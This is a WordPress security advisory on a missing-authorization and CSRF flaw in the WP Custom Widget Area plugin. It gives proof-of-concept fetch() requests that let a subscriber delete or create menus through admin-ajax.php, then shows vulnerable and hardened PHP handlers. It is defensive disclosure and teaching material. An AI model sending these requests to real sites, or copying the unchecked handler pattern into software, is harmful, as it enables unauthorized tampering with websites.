wpvulndb / Krzysztof Zając (CERT PL)
WPVDB-ID: F8F84D47-49AA-4258-A8A6-3DE8E7342623
History: Dec 21, 2023 - 12:00 a.m.

WP Custom Widget Area <= 1.2.5 - Subscriber+ Menus Creation/Deletion/Update

2023-12-21 00:00:00
Krzysztof Zając (CERT PL)
wpscan.com
7
Tags: wordpress, custom widget area, security vulnerability, ajax actions, subscriber+ privilege

AI Score: 6.4
Confidence: High
EPSS: 0
Percentile: 14.0%

Description

The plugin does not apply capability checks or nonce checks to any of its AJAX action callbacks. Registering a callback on a wp_ajax_* hook only requires the caller to be logged in, so any authenticated user with the Subscriber role or higher can create, delete or modify the plugin's menus by calling admin-ajax.php directly. Because no nonce is verified either, the same actions can be triggered cross-site against a logged-in administrator.

PoC

Log in as a subscriber and paste either of the following fetch() calls into the browser's console:

    // Deletes an existing menu
    fetch("http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=delete_menu", {
      headers: { "content-type": "application/x-www-form-urlencoded" },
      body: "data[cwa_id]=test",
      method: "POST",
    })

    // Creates a new menu with the title "Hacked Title"
    fetch("http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=add_menu", {
      headers: { "content-type": "application/x-www-form-urlencoded" },
      body: "data[cwa_id]=test&data[cwa_name]=Hacked+Title",
      method: "POST",
    })

fetch() sends the site cookies by default for same-origin requests, so the calls run with the subscriber's session; the request succeeds because the callback never checks who is calling it.
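The pattern the advisory describes, beside the hardened form, as an added example: this is not the plugin's code, and the handler names, the option key `cwa_example_menus`, the nonce action `cwa_example_menu` and the `edit_theme_options` capability are assumptions made for illustration. Only the AJAX action names (`add_menu`, `delete_menu`) and the request parameters (`data[cwa_id]`, `data[cwa_name]`) come from the PoC above.

```php
<?php
// Added example, not code from the WP Custom Widget Area plugin.
// Handler names, option key, nonce action and capability are hypothetical.

// --- Vulnerable pattern -------------------------------------------------
// Hooking wp_ajax_delete_menu makes the callback reachable by any logged-in
// user; it is not an authorization check. A subscriber hitting
// admin-ajax.php?action=delete_menu lands here and the menu is removed.
add_action( 'wp_ajax_delete_menu', 'cwa_example_delete_menu_vulnerable' );

function cwa_example_delete_menu_vulnerable() {
    $id    = isset( $_POST['data']['cwa_id'] ) ? sanitize_key( $_POST['data']['cwa_id'] ) : '';
    $menus = get_option( 'cwa_example_menus', array() );
    unset( $menus[ $id ] );
    update_option( 'cwa_example_menus', $menus );
    wp_send_json_success();
}

// --- Hardened pattern ---------------------------------------------------
// Both checks are needed: the capability check stops subscribers, the nonce
// check stops a third-party page from firing the action in an admin's browser.
function cwa_example_authorize() {
    // Dies with a 403 response when the nonce is missing or invalid.
    check_ajax_referer( 'cwa_example_menu', 'nonce' );

    // Managing widget areas/menus is an edit_theme_options task (admins only
    // on a default install); subscribers do not have it.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
}

add_action( 'wp_ajax_add_menu', 'cwa_example_add_menu' );
add_action( 'wp_ajax_delete_menu', 'cwa_example_delete_menu' );

function cwa_example_add_menu() {
    cwa_example_authorize();

    $id   = isset( $_POST['data']['cwa_id'] )   ? sanitize_key( $_POST['data']['cwa_id'] ) : '';
    $name = isset( $_POST['data']['cwa_name'] ) ? sanitize_text_field( wp_unslash( $_POST['data']['cwa_name'] ) ) : '';
    if ( '' === $id || '' === $name ) {
        wp_send_json_error( 'missing parameters', 400 );
    }

    $menus        = get_option( 'cwa_example_menus', array() );
    $menus[ $id ] = $name;
    update_option( 'cwa_example_menus', $menus );
    wp_send_json_success( array( 'id' => $id ) );
}

function cwa_example_delete_menu() {
    cwa_example_authorize();

    $id = isset( $_POST['data']['cwa_id'] ) ? sanitize_key( $_POST['data']['cwa_id'] ) : '';
    $menus = get_option( 'cwa_example_menus', array() );
    if ( ! isset( $menus[ $id ] ) ) {
        wp_send_json_error( 'no such menu', 404 );
    }
    unset( $menus[ $id ] );
    update_option( 'cwa_example_menus', $menus );
    wp_send_json_success();
}

// The legitimate admin page hands the nonce to its own JavaScript, which then
// posts it as the "nonce" field alongside data[cwa_id] / data[cwa_name].
function cwa_example_enqueue_admin() {
    wp_enqueue_script( 'cwa-example-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'cwa-example-admin', 'cwaExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'cwa_example_menu' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'cwa_example_enqueue_admin' );
```

With the hardened handlers in place, the subscriber PoC above gets a 403 from check_ajax_referer() before any option is touched, and a request that somehow carries a valid nonce but comes from a subscriber is still refused by the capability check. When reviewing a plugin for this class of bug, grep for every add_action( 'wp_ajax_ and wp_ajax_nopriv_ registration and confirm that each callback reaches both a current_user_can() and a check_ajax_referer() or wp_verify_nonce() call before it reads or writes anything.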

